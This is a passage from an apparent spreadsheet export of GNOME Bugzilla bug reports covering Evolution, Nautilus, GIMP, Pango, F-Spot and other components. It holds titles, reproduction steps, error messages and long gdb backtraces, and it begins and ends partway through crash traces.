#8  0x413b33c6 in gnutls_record_recv () from /home/pohly/garnome.aux/lib/libgnutls.so.12
#9  0x41388ed5 in soup_gnutls_read (channel=0x80fe690 
    buf=0x8432d00 \230\230\217A\230\230\217AE: Produced By Microsoft Exchange V6.5\r\nReceived: by swsmsx404 \r\n\tid  Mon 16 Jan 2006 12:57:47 -0000\r\nMIME-Version: 1.0\r\nContent-Type: multipart/alternative\r\n\tb... count=8192 bytes_read=0xbfff9e48 err=0xbfff9e90) at soup-gnutls.c:185
#10 0x41775baf in IA__g_io_channel_read_chars (channel=0x80fe690 
    buf=0x8432d00 \230\230\217A\230\230\217AE: Produced By Microsoft Exchange V6.5\r\nReceived: by swsmsx404 \r\n\tid  Mon 16 Jan 2006 12:57:47 -0000\r\nMIME-Version: 1.0\r\nContent-Type: multipart/alternative\r\n\tb... count=8192 bytes_read=0xbfff9f38 error=0xbfff9e90) at giochannel.c:1779
#11 0x413985f8 in read_from_network (sock=0x80c36a0 buffer=0x8432d00 len=8192 nread=0xbfff9f38)
    at soup-socket.c:1085
---Type  to continue or q  to quit---
#12 0x41398984 in soup_socket_read_until (sock=0x80c36a0 buffer=0xbfff9f40 len=8192 boundary=0x4139c8dc 
    boundary_len=4 nread=0xbfff9f38 got_boundary=0xbfff9f34) at soup-socket.c:1237
#13 0x4138d74f in read_metadata (msg=0x80ca248 boundary=0x4139c8dc \r\n\r\n) at soup-message-io.c:199
#14 0x4138e122 in io_read (sock=0x80c36a0 msg=0x80ca248) at soup-message-io.c:532
#15 0x4138e096 in io_write (sock=0x80c36a0 msg=0x80ca248) at soup-message-io.c:505
#16 0x4138e78b in soup_message_io_client (msg=0x80ca248 sock=0x80c36a0 conn=0x80c65a0 
    get_headers_cb=0x4138cccd  parse_headers_cb=0x4138cae8  
    user_data=0x0) at soup-message-io.c:753
#17 0x4138cf57 in soup_message_send_request_internal (req=0x80ca248 sock=0x80c36a0 conn=0x80c65a0 
    is_via_proxy=0) at soup-message-client-io.c:185
#18 0x41384d39 in send_request (conn=0x80c65a0 req=0x80ca248) at soup-connection.c:769
#19 0x41384d5a in soup_connection_send_request (conn=0x80c65a0 req=0x80ca248) at soup-connection.c:788
#20 0x4139516d in send_message (session=0x80a65a8 msg=0x80ca248) at soup-session-sync.c:177
#21 0x413946f8 in soup_session_send_message (session=0x80a65a8 msg=0x80ca248) at soup-session.c:1320
#22 0x407be69c in e2k_context_send_message (ctx=0x80c5c40 op=0x0 msg=0x80ca248) at e2k-context.c:871
#23 0x407be906 in e2k_context_get (ctx=0x80c5c40 op=0x0 
    uri=0x8159a40 https://email.intel.com/exchange/patrick.ohly/Calendar/Updated:%20Weekly%20Site%20Meeting-6.EML content_type=0x0 body=0xbfffc194 len=0xbfffc170) at e2k-context.c:954
#24 0x0806ed9f in get_changed_events (cbex=0x808e768) at e-cal-backend-exchange-calendar.c:489
#25 0x0806efcd in notify_changes (ctx=0x80c5c40 
    uri=0x8255570 https://email.intel.com/exchange/patrick.ohly/Calendar/ type=E2K_CONTEXT_OBJECT_CHANGED 
    user_data=0x808e768) at e-cal-backend-exchange-calendar.c:525
#26 0x407c1883 in maybe_notification (sub=0x82322a8) at e2k-context.c:2353
---Type  to continue or q  to quit---
#27 0x407c19e9 in polled (msg=0x80ca590 user_data=0x82322a8) at e2k-context.c:2389
#28 0x416fdb84 in IA__g_cclosure_marshal_VOID__VOID (closure=0x8170c78 return_value=0x0 n_param_values=1 
    param_values=0xbfffc600 invocation_hint=0xbfffc468 marshal_data=0x0) at gmarshal.c:77
#29 0x416e7c73 in IA__g_closure_invoke (closure=0x8170c78 return_value=0x0 n_param_values=1 
    param_values=0xbfffc600 invocation_hint=0xbfffc468) at gclosure.c:490
#30 0x416fd1bc in signal_emit_unlocked_R (node=0x80c9048 detail=0 instance=0x80ca590 emission_return=0x0 
    instance_and_params=0xbfffc600) at gsignal.c:2438
#31 0x416fc3cb in IA__g_signal_emit_valist (instance=0x80ca590 signal_id=68 detail=0 
    var_args=0xbfffc78c ï¿½ï¿½8AÐ¥\f\b\204ï¿½9Aï¿½ï¿½ï¿½ï¿½ï¿½ï¿½8A\220ï¿½\f\b\220ï¿½\f\b) at gsignal.c:2197
#32 0x416fc6fc in IA__g_signal_emit (instance=0x80ca590 signal_id=68 detail=0) at gsignal.c:2241
#33 0x4138c20f in soup_message_finished (msg=0x80ca590) at soup-message.c:558
#34 0x4138d5c9 in soup_message_io_finished (msg=0x80ca590) at soup-message-io.c:153
#35 0x4138e585 in io_read (sock=0x80c31c0 msg=0x80ca590) at soup-message-io.c:670
#36 0x416fdb84 in IA__g_cclosure_marshal_VOID__VOID (closure=0x8479828 return_value=0x0 n_param_values=1 
    param_values=0xbfffcb90 invocation_hint=0xbfffc9f8 marshal_data=0x0) at gmarshal.c:77
#37 0x416e7c73 in IA__g_closure_invoke (closure=0x8479828 return_value=0x0 n_param_values=1 
    param_values=0xbfffcb90 invocation_hint=0xbfffc9f8) at gclosure.c:490
#38 0x416fd1bc in signal_emit_unlocked_R (node=0x80c77a0 detail=0 instance=0x80c31c0 emission_return=0x0 
    instance_and_params=0xbfffcb90) at gsignal.c:2438
#39 0x416fc3cb in IA__g_signal_emit_valist (instance=0x80c31c0 signal_id=52 detail=0 
    var_args=0xbfffcd1c \033\2059A\020) at gsignal.c:2197
#40 0x416fc6fc in IA__g_signal_emit (instance=0x80c31c0 signal_id=52 detail=0) at gsignal.c:2241
#41 0x4139857c in socket_read_watch (chan=0x8107a40 cond=G_IO_IN user_data=0x80c31c0) at soup-socket.c:1069
---Type  to continue or q  to quit---
#42 0x417acda3 in g_io_unix_dispatch (source=0x8485678 callback=0x4139850f  
    user_data=0x80c31c0) at giounix.c:162
#43 0x4177f48a in g_main_dispatch (context=0x80a8f88) at gmain.c:1916
#44 0x417807ef in IA__g_main_context_dispatch (context=0x80a8f88) at gmain.c:2466
#45 0x41780d0d in g_main_context_iterate (context=0x80a8f88 block=1 dispatch=1 self=0x808ab10)
    at gmain.c:2547
#46 0x417814c8 in IA__g_main_loop_run (loop=0x80bd938) at gmain.c:2751
#47 0x414a3726 in bonobo_main () at bonobo-main.c:311
#48 0x0805bca0 in main (argc=1 argv=0xbfffd064) at main.c:238
#0  0x41848e48 in _int_free () from /lib/tls/libc.so.6</t>
  </si>
  <si>
    <t>GNOME-MAG-117991</t>
  </si>
  <si>
    <t>server's registration problems</t>
  </si>
  <si>
    <t>Using gnome-2.4 nightly build from 18 July 2003.
.logged in as root
accessibility key set to true.
- launch gnopernicus
- enable magnifier from general preferences
. the magnifier loads up ok but with the following errors:
Activation error: during magnifier activation:
IDL:omg.org/CORBA/COMM_FAILURE:1.0
(srcore:8443): gnopernicus-WARNING **: Could not locate magnifier
** Magnifier initialization failed.
   (Possible cause : 1. You don't have gnome-mag installed
                     2. GNOME_Magnifier.server file is missing)
.GNOME_Magnifier.server is located in
/opt/gnome-2.4/lib/bonobo/servers/GNOME_Magnifier.server
The magnifier option in general preferences also wrongly reads
(unavailable) and is grey when the magnifier obviously is available and
launches.</t>
  </si>
  <si>
    <t>EVOLUTION-216867</t>
  </si>
  <si>
    <t>Contry list is not alphabetically sorted</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0
Synopsis: Contry list is not alphabetically sorted
Bugzilla-Product: Evolution
Bugzilla-Component: Contacts [was: Addressbook]
Description:
1. Select Contacts
2. Select a contact and invoke the contact editor dialog.
3. Click the Address... button. The evolution-addressbook dialog
appears.
4. Click the Country dropdown list.
The Country names are not alphabetically sorted on a localized version
of Evolution. I use Hungarian and the country names are translated but
they are in the wrong order (i.e. the original English order).
</t>
  </si>
  <si>
    <t>GNOMORADIO-56676</t>
  </si>
  <si>
    <t>commandoradio needs man page</t>
  </si>
  <si>
    <t>PANGO-355782</t>
  </si>
  <si>
    <t>Misaligned extents in pango</t>
  </si>
  <si>
    <t>Please describe the problem:
I wrote a test program that goes through each combination of logical/ink line/cluster/run/char and left/center/right alignment.  Several of the combinations have misaligned extents atleast for some lines:
3: left cluster logical.  First line is misaligned.
4: left cluster ink.  First line is misaligned.
10: center line ink.  All lines are misaligned.
11: center cluster logical.  First align is misaligned.
12: center cluster ink.  First line is misaligned.
18: right link ink.  All lines are misaligned.
I will attach the test program (which uses pygtk).  Note that it demonstrates two other bugs (trailing whitespace char crashes).  I will file reports for them separately.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>rhamph</t>
  </si>
  <si>
    <t>GIMP-172581</t>
  </si>
  <si>
    <t>gimpdata object filename problem if not representable in file name encoding</t>
  </si>
  <si>
    <t>Run GIMP 2.2 with GLib 2.4 on Win32 in a locale that uses characters that aren't
representable in the system codepage (for instance run GIMP in Turkish on a
Western European (codepage 1252) Windows installation). When you quit it
crashes in gimp_data_create_filename() because g_filename_from_utf8() returns
NULL because the object names are localized and some of the localized names
contain characters not in codepage 1252.
Possible ways to fix this: Maybe gimpobject could also keep a non-localized name
for the object to be used for file names? That's probably a too big change for
the stable branch though. Maybe gimp_data_create_filename() should use some
fallback name (hex encoded UTF-8?) if g_filename_from_utf8() returns NULL?
This problem probably can occur also on Unix if you have a non-UTF-8 locale but
still run GIMP with a LANG setting that uses characters not present in the
filename encoding? Or would such a situation come under don't do that then?</t>
  </si>
  <si>
    <t>GSTREAMER-337031</t>
  </si>
  <si>
    <t>vorbisdec outputs too much data</t>
  </si>
  <si>
    <t>Vorbisdec outputs additional data beyond the end of the stream.
We don't set EOS on the packets fed to libvorbis so libvorbis is unable to correctly trim the final packet. This means we output made-up-data beyond the end of the actual stream.
We need to delay pushing the packets into the decoder library by a packet so that  we can push the final packet with EOS set when we get the EOS event.</t>
  </si>
  <si>
    <t>WEBSITE-565937</t>
  </si>
  <si>
    <t>help.gnome.org</t>
  </si>
  <si>
    <t>Update link to guide 'Writing new-style modules for Deskbar-Applet'</t>
  </si>
  <si>
    <t>Please update the link at http://library.gnome.org/devel/guides so it points to http://projects.gnome.org/deskbar-applet/new-style_modules.html</t>
  </si>
  <si>
    <t>sebp</t>
  </si>
  <si>
    <t>GAZPACHO-329916</t>
  </si>
  <si>
    <t>Box: changing size should remove placeholders first</t>
  </si>
  <si>
    <t>When changing the size property of a vbox/hbox the placeholders should be removed first. Right now the last slot in the box is removed even if that contains a widget and there are empty slots (placeholders) available.</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-256535</t>
  </si>
  <si>
    <t>Alarms are lost when saving events to GW server</t>
  </si>
  <si>
    <t>Alarms created in the Evo GUI are not saved to the GW server</t>
  </si>
  <si>
    <t>F-SPOT-392470</t>
  </si>
  <si>
    <t>Add tracing and profiling support to the f-spot launcher script</t>
  </si>
  <si>
    <t>Attached patch adds tracing and profiling support to the launcher script. I've added similar functionality to banshee this patch is 95% identical.</t>
  </si>
  <si>
    <t>NAUTILUS-96722</t>
  </si>
  <si>
    <t>Nautilus failing to show media with same label as another mounted media</t>
  </si>
  <si>
    <t>1) Insert a floppy disk.
2) Select floppy icon on backdrop right click and select 'Format'.
gmedia_format application gets launched. 
4) Chose UFS as filesystem label the disk 'hello' and click Apply.
5) After format complete's and floppy icon labeled 'hello' is on backdrop.
6) Now insert a zip drive right-click and select Format. gemdia_format
dialog appears. 
7) Chose UFS as filesystem label the disk 'hello' and click Apply.
Format complete's zip disk labeled 'hello' is not shown on backdrop
although it has been formatted and remounted notification file in
/tmp/.removable is present.</t>
  </si>
  <si>
    <t>narayana.pattipati</t>
  </si>
  <si>
    <t>GIMP-WEB-682403</t>
  </si>
  <si>
    <t>Mirror list displaying an error</t>
  </si>
  <si>
    <t>The error the list of mirrors displays is:
[an error occurred while processing this directive]
No mirrors are displayed.</t>
  </si>
  <si>
    <t>jobs</t>
  </si>
  <si>
    <t>GNOME-APPLETS-115845</t>
  </si>
  <si>
    <t>Network background cannot be changed</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-applets
Severity: normal
Version: GNOME2.2.2 2.2.2
os_details: Ximian Inc.
Synopsis: Network background cannot be changed
Bugzilla-Product: gnome-applets
Bugzilla-Component: multiload
Description:
I want the load meters to be nice and hidden when nothing is happening. 
For processor and swap I can set the free colour to the same colour
as my panel. However for the network applet I cannot do this.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-06-24 06:56 -------
Reassigning to the default owner of the component gnome-applets-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-504968</t>
  </si>
  <si>
    <t>Missing configure checks</t>
  </si>
  <si>
    <t>Some pkg-config checks are missing from configure.ac which result in the following missing header errors at compile time.
From capplets/common:
activate-settings-daemon.c:5:57: error: gnome-settings-daemon/gnome-settings-client.h: No such file or directory
From libslab:
directory-tile.c:25:34: error: eel/eel-alert-dialog.h: No such file or directory</t>
  </si>
  <si>
    <t>GTHUMB-461469</t>
  </si>
  <si>
    <t>folder browsing not possible when opening gthumb from nautilus</t>
  </si>
  <si>
    <t>Please describe the problem:
folder browsing not possible when opening gthumb from nautilus using gthumb v 2.11 (trunk rev 1836)
Steps to reproduce:
1. open gthumb from image in nautilus
2. try to leave image mode by clicking the 'x' close button 
3. 
Actual results:
The folder view does not appear no matter how you try to leave the mode by clicking the close button. Alt-1 or selecting View-&gt;Folder from the menu restores the folder navigation
Expected results:
To have the 'close' button work as usual
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>joakim</t>
  </si>
  <si>
    <t>EVOLUTION-587739</t>
  </si>
  <si>
    <t>Evolution stopped functioning after network outage</t>
  </si>
  <si>
    <t>Please describe the problem:
I had some network outage and I had to switch between lan and wifi several times. After that I had to settle with wifi. But since then evolution is repeatedly giving errors while refreshing inbox folder. When I run from gdb i see lots of errors like below:
(evolution.bin:12841): Gtk-WARNING **: Failed to set text from markup due to error parsing markup: Error on line 3 char 57: Invalid UTF-8 encoded text in name - not valid 'Could not open '\xe0\xd9\xd4\u0008mob/Accounts':
No such folder \xe0\xd9\xd4\u0008mob/Accounts
Changes made to this folder will not be resynchronized.'
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>EVOLUTION-231812</t>
  </si>
  <si>
    <t>Day begins in Settings should respect 12/24 time pref</t>
  </si>
  <si>
    <t>When you open the Calendar Settings tab the drop-down selection box for
the Day begins and Day ends prefs is in 24-hour format.  If you change
the Time format pref from 12 to 24 hour and back it will change to 12-hour
format.  It should when you first open the tab show the time in whatever
format's selected.</t>
  </si>
  <si>
    <t>rzach</t>
  </si>
  <si>
    <t>GNUMERIC-114085</t>
  </si>
  <si>
    <t>18.11 - References do not change in validate cells</t>
  </si>
  <si>
    <t>1. Start off with gnumeric_18_11.gnumeric
[http://www.gnome.org/~chema/gnumeric_18_11.gnumeric]
2. Select B7
3. Right click -&gt; Format Cells -&gt; Validate tab
4. Note that Min=$B$3 and Max=$B$4
5. Exit format dialog
6. Select B3:B4 &amp; Cut. Paset in D3:D4
7. Select B7
8. Right click -&gt; Format Cells -&gt; Validate tab
9. Note that Min=$B$3 and Max=$B$4 
Should have changed to where the B3:B4 range was moved (D3:D4)</t>
  </si>
  <si>
    <t>EVOLUTION-272527</t>
  </si>
  <si>
    <t>Import dialog placement</t>
  </si>
  <si>
    <t>Import dialog is always displayed in the top-right corner of the screen.
Since Spatial Nautilus became so important the dialog should be displayed
whenever I placed it the last time. Maybe the default should also be
changed so that the Import dialog is placed in the center of the screen (or
centered on the Evolution shell).
This might be less important when you use the import a couple of times but
when you're importing a lot of mbox files from Thunderbird you'll begin to
think that it would be nice if the dialogs are presented in a more
intuitive coordinate.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-140358</t>
  </si>
  <si>
    <t>VT switch (from X to console) *DOES NOT WORK* using NON-GNOME-DEFAULT keyboards in Keyboard Switcher Applet</t>
  </si>
  <si>
    <t xml:space="preserve">STEPS TO REPRODUCE BUG 
--------------------------------------------- 
1) Launch Gnome desktop V2.0.X or V2.2.X or V2.4.X (under XFree 4.X). 
2) If Gnome Panel is not running already start Gnome Panel. 
3) Place Gnome Keyboard Switcher applet on Gnome Panel (if it isn't already there). 
4) In Gnome Keyboard Switcher applet's properties add new keyboard type (in my 
case this was a French Canadian but any keyboard type different than the default 
GNOME DEFAULT KEYBOARD *SHOULD* cause the issue). 
5) Use Gnome Keyboard Switcher applet to switch to a new keyboard type (ex: 
French Canadian) by clicking on Gnome Keyboard Switcher using mouse. 
6) Attempt to VT switch from X to console (by pressing any ALT-CTRL-Fn key i.e. 
ALT-CTRL-F2). 
RESULTS 
--------------------------------------------- 
VT switch *DOES NOT* happen as expected and user stays in X. 
WORKAROUNDS 
--------------------------------------------- 
Select GNOME DEFAULT KEYBOARD type using the Gnome Keyboard Switcher 
applet and VT switching (from X to console) becomes possible again using 
ALT-CTRL-Fn keys. 
MORE INFOS / OBSERVATIONS 
--------------------------------------------- 
- XFree 4.X option DontVTSwitch is DISABLED AT *ALL* times in XFree86Config 
file. 
- Using a console prompt within X I have noticed using the xev program that X 
keyboard events triggered while attempting to do a VT switch using the GNOME 
DEFAULT KEYBOARD are *DIFFERENT* than the SUPPOSEDLY SAME keyboards 
events triggered while attempting to do a VT switch using any NON-GNOME 
DEFAULT KEYBOARD (there seems to be an offset of 10 in the detected Fn keys 
while NON-GNOME-DEFAULT keyboards are active in the Gnome Keyboard 
Switcher applet). 
- Using a console prompt within X again I have also noticed that it *IS* possible to 
VT switch from X to console even if a NON-GNOME DEFAULT KEYBOARD is 
currently selected in the Gnome Keyboard Switcher applet -- I just bypass the 
Gnome Keyboard Switcher applet and I use the /usr/bin/chvt X program [as 
ROOT] directly (where X is a number equivalent to the Fn key I would press to get 
to a specific console) -- not very practical and safe though. 
- This bug *DOES NOT* occur with the older Gnome 1.4 desktop's Keyboard 
Switcher applet. 
- This bug has been observed in Gnome 2.0.X 2.2.X 2.4.X. 
- This bug has *NOT* been tested in Gnome 2.6.X. 
BUG DISCOVERED BY:  Jeannot Langlois  or 
 or 
BUG LOGGED BY:  Jeannot Langlois  or 
WORKAROUNDS FOUND BY:   Martin Catudal </t>
  </si>
  <si>
    <t>jeannot12</t>
  </si>
  <si>
    <t>F-SPOT-512389</t>
  </si>
  <si>
    <t>Import</t>
  </si>
  <si>
    <t>Importing fails with null value</t>
  </si>
  <si>
    <t>Please describe the problem:
Some photos previously used with f-spot seems to cause problems to this version. 
This is the output of the problem:
open uri = file:///home/andrea/a/09/13/DSC00238.JPG
open uri = file:///home/andrea/a/09/13/DSC00238.JPG
open uri = file:///home/andrea/Documenti/Immagini/foto/2007/09/13/DSC00238.JPG
Error importing /home/andrea/a/09/13/DSC00238.JPG
System.NullReferenceException: A null value was found where an object instance was required.
  at FSpot.Xmp.XmpTagsImporter.ProcessStore (FSpot.MetadataStore store .Photo photo) [0x00000] 
  at FSpot.Xmp.XmpTagsImporter.Import (.Photo photo System.String path System.String orig_path) [0x00000] 
  at FileImportBackend.Step (.Photo&amp; photo Gdk.Pixbuf&amp; thumbnail System.Int32&amp; count) [0x00000] 
Could not import file
Steps to reproduce:
1. Open F-spot
2. Import the photos (I'll try to attach a file here)
Actual results:
Error message pops out and lets you skip the file.
Expected results:
I expect it to self-correct problems with metadata upon importing
Does this happen every time?
Only with a restricted group of photos on my system
Other information:
I think is some change in metadata handling</t>
  </si>
  <si>
    <t>GLADE-444959</t>
  </si>
  <si>
    <t>Problem loading GtkImage with stock item</t>
  </si>
  <si>
    <t>Please describe the problem:
GtkImage widgets with certain stock items have their items changed.  Some are changed to other stock items and some are changed to None.
Steps to reproduce:
1. Create a window with a GtkImage.
2. Select the gtk-file or GNOME About stock image.
3. Save and close.
4. Reopen the project.
Actual results:
In the case of gtk-file as the saved stock image the stock image changes to None.  In the case of GNOME About as the saved stock image the stock image changes to gtk-dialog-authentication.
Expected results:
The same stock images that were saved should be loaded.
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>jeff.westerinen</t>
  </si>
  <si>
    <t>FILE-ROLLER-312243</t>
  </si>
  <si>
    <t>wrong zoo and 7-zip extensions</t>
  </si>
  <si>
    <t>Somehow somebody mixed up the extensions for zoo and 7-zip. In src/actions.c in
function get_supported_archive_types when zoo is found in the path the
extension added is .7z. With 7-zip archives it's the other way round.</t>
  </si>
  <si>
    <t>octothorpe</t>
  </si>
  <si>
    <t>GNOME-PANEL-74274</t>
  </si>
  <si>
    <t>Cannot choose large menu icons on panel menu.</t>
  </si>
  <si>
    <t>In GNOME 1 I had the option of using large icons in my panel menus which
made the panel easier to navigate and made it look less ridiculous on
today's  high-resolution displays.  This option seems to have disappeared
in GNOME 2.    I think that it should be reinstated.</t>
  </si>
  <si>
    <t>NAUTILUS-90579</t>
  </si>
  <si>
    <t>crash in gnome-mime-data stuff</t>
  </si>
  <si>
    <t>Package: nautilus
Severity: critical
Version: 2.0.3
Synopsis: crash in gnome-mime-data stuff
Bugzilla-Product: nautilus
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.0.3)
Description:
Description of Problem:
This is with latest nautilus + alexg's gnome-vfs vfolder rewrite
branch.
Steps to reproduce the problem:
1. delete launcher from 'applications:'
2. note that launcher doesn't go away
3. hit reload button get crash
Debugging Information:
Backtrace was generated from '/usr/bin/nautilus'
[New Thread 1024 (LWP 1838)]
[New Thread 2049 (LWP 1841)]
[New Thread 1026 (LWP 1842)]
[New Thread 2051 (LWP 1843)]
[New Thread 3076 (LWP 1844)]
[New Thread 4101 (LWP 1845)]
[New Thread 5126 (LWP 1846)]
[New Thread 6151 (LWP 1847)]
[New Thread 7176 (LWP 1848)]
[New Thread 8201 (LWP 1849)]
[New Thread 9226 (LWP 1850)]
[New Thread 10251 (LWP 1851)]
0x40a3b4b9 in wait4 () from /lib/libc.so.6
#0  0x40a3b4b9 in wait4 () from /lib/libc.so.6
#1  0x40ab330c in __DTOR_END__ () from /lib/libc.so.6
#2  0x4083283a in waitpid () from /lib/libpthread.so.0
#3  0x401f4d35 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:620
#4  0x40830307 in pthread_sighandler () from /lib/libpthread.so.0
#5  
#6  0x4007cd99 in nautilus_file_invalidate_attributes (file=0x84c82e0 
    file_attributes=0x8431c90) at nautilus-file.c:4975
#7  0x40062771 in mime_db_changed_callback (ignore=0x82373f8
dir=0x84f7690)
    at nautilus-directory-async.c:613
#8  0x40808c7a in g_cclosure_marshal_VOID__VOID (closure=0x84adb68 
    return_value=0x0 n_param_values=1 param_values=0xbfffeed0 
    invocation_hint=0xbfffedd8 marshal_data=0x0) at gmarshal.c:77
#9  0x407f3f4a in g_closure_invoke (closure=0x84adb68 return_value=0x0
    n_param_values=1 param_values=0xbfffeed0
invocation_hint=0xbfffedd8)
    at gclosure.c:437
#10 0x40807e4f in signal_emit_unlocked_R (node=0x8237058 detail=0 
    instance=0x82373f8 emission_return=0x0
instance_and_params=0xbfffeed0)
    at gsignal.c:2341
#11 0x408065ee in g_signal_emit_valist (instance=0x82373f8
signal_id=205 
    detail=0 var_args=0xbffff05c) at gsignal.c:2100
#12 0x4080686b in g_signal_emit (instance=0x82373f8 signal_id=205
detail=0)
    at gsignal.c:2144
#13 0x406ab959 in gnome_vfs_mime_monitor_emit_data_changed
(monitor=0x82373f8)
    at gnome-vfs-mime-monitor.c:169
#14 0x406a9064 in gnome_vfs_mime_info_reload () at
gnome-vfs-mime-info.c:768
#15 0x406a8ed8 in reload_if_needed () at gnome-vfs-mime-info.c:706
#16 0x406a93b9 in get_value_real (
    mime_type=0x82a8d68 x-directory/vfolder-desktop 
    key=0x406ba8a4 description user_hash_table=0x80ebcc0 
    system_hash_table=0x80eb9d0) at gnome-vfs-mime-info.c:914
#17 0x406a94c3 in gnome_vfs_mime_get_value (
    mime_type=0x82a8d68 x-directory/vfolder-desktop 
    key=0x406ba8a4 description) at gnome-vfs-mime-info.c:968
#18 0x406a62d3 in gnome_vfs_mime_get_description (
    mime_type=0x82a8d68 x-directory/vfolder-desktop)
    at gnome-vfs-mime-handlers.c:63
#19 0x4007ba51 in get_description (file=0x84f7a40) at
nautilus-file.c:4219
#20 0x4007bbf9 in nautilus_file_get_type_as_string (file=0x84f7a40)
    at nautilus-file.c:4269
#21 0x08070f73 in update_more_info (sidebar_title=0x82138f0)
    at nautilus-sidebar-title.c:518
#22 0x0807130c in update_all (sidebar_title=0x82138f0)
    at nautilus-sidebar-title.c:671
#23 0x40808c7a in g_cclosure_marshal_VOID__VOID (closure=0x83912b0 
    return_value=0x0 n_param_values=1 param_values=0xbffff500 
    invocation_hint=0xbffff408 marshal_data=0x0) at gmarshal.c:77
#24 0x407f3f4a in g_closure_invoke (closure=0x83912b0 return_value=0x0
    n_param_values=1 param_values=0xbffff500
invocation_hint=0xbffff408)
    at gclosure.c:437
#25 0x40807e4f in signal_emit_unlocked_R (node=0x8213718 detail=0 
    instance=0x84f7a40 emission_return=0x0
instance_and_params=0xbffff500)
    at gsignal.c:2341
#26 0x408065ee in g_signal_emit_valist (instance=0x84f7a40
signal_id=195 
    detail=0 var_args=0xbffff68c) at gsignal.c:2100
#27 0x4080686b in g_signal_emit (instance=0x84f7a40 signal_id=195
detail=0)
    at gsignal.c:2144
#28 0x4007c888 in nautilus_file_emit_changed (file=0x84f7a40)
    at nautilus-file.c:4775
#29 0x4007c6b5 in nautilus_file_changed (file=0x84f7a40)
    at nautilus-file.c:4716
#30 0x40062f53 in dequeue_pending_idle_callback
(callback_data=0x84f7690)
    at nautilus-directory-async.c:949
#31 0x40063288 in directory_load_callback (handle=0x4c 
    result=GNOME_VFS_ERROR_EOF list=0x8431f18 entries_read=22 
    callback_data=0x84f7690) at nautilus-directory-async.c:1079
#32 0x406a396e in dispatch_load_directory_callback
(notify_result=0x85c8bc0)
    at gnome-vfs-job.c:259
#33 0x406a3ee1 in dispatch_job_callback (data=0x85c8bc0) at
gnome-vfs-job.c:553
#34 0x4085ddd8 in g_idle_dispatch (source=0x85dc848 
    callback=0x406a3d90  user_data=0x85c8bc0)
    at gmain.c:3153
#35 0x4085b796 in g_main_dispatch (context=0x80cb040) at gmain.c:1642
#36 0x4085c5ad in g_main_context_dispatch (context=0x80cb040) at
gmain.c:2186
#37 0x4085c940 in g_main_context_iterate (context=0x80cb040 block=1 
    dispatch=1 self=0x80bd180) at gmain.c:2267
#38 0x4085cfe6 in g_main_loop_run (loop=0x82acd88) at gmain.c:2487
#39 0x403d88c3 in gtk_main () at gtkmain.c:936
#40 0x080662d9 in main (argc=5 argv=0xbffffb64) at nautilus-main.c:262
#41 0x409a81c4 in __libc_start_main () from /lib/libc.so.6
Thread 12 (Thread 10251 (LWP 1851)):
#0  0x409b9136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4082fa61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4082bea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x406b1a9c in gnome_vfs_thread_pool_wait_for_work (state=0x836edc8)
    at gnome-vfs-thread-pool.c:155
	state = (GnomeVFSThreadState *) 0x836edc8
#4  0x406b1ae1 in thread_entry (cast_to_state=0x836edc8)
    at gnome-vfs-thread-pool.c:176
	state = (GnomeVFSThreadState *) 0x836edc8
#5  0x4082cf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 11 (Thread 9226 (LWP 1850)):
#0  0x409b9136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4082fa61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4082bea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x406b1a9c in gnome_vfs_thread_pool_wait_for_work (state=0x8378918)
    at gnome-vfs-thread-pool.c:155
	state = (GnomeVFSThreadState *) 0x8378918
#4  0x406b1ae1 in thread_entry (cast_to_state=0x8378918)
    at gnome-vfs-thread-pool.c:176
	state = (GnomeVFSThreadState *) 0x8378918
#5  0x4082cf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 10 (Thread 8201 (LWP 1849)):
#0  0x409b9136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4082fa61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4082bea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x406b1a9c in gnome_vfs_thread_pool_wait_for_work (state=0x8377c18)
    at gnome-vfs-thread-pool.c:155
	state = (GnomeVFSThreadState *) 0x8377c18
#4  0x406b1ae1 in thread_entry (cast_to_state=0x8377c18)
    at gnome-vfs-thread-pool.c:176
	state = (GnomeVFSThreadState *) 0x8377c18
#5  0x4082cf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 9 (Thread 7176 (LWP 1848)):
#0  0x409b9136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4082fa61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4082bea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x406b1a9c in gnome_vfs_thread_pool_wait_for_work (state=0x83775b8)
    at gnome-vfs-thread-pool.c:155
	state = (GnomeVFSThreadState *) 0x83775b8
#4  0x406b1ae1 in thread_entry (cast_to_state=0x83775b8)
    at gnome-vfs-thread-pool.c:176
	state = (GnomeVFSThreadState *) 0x83775b8
#5  0x4082cf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 8 (Thread 6151 (LWP 1847)):
#0  0x409b9136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
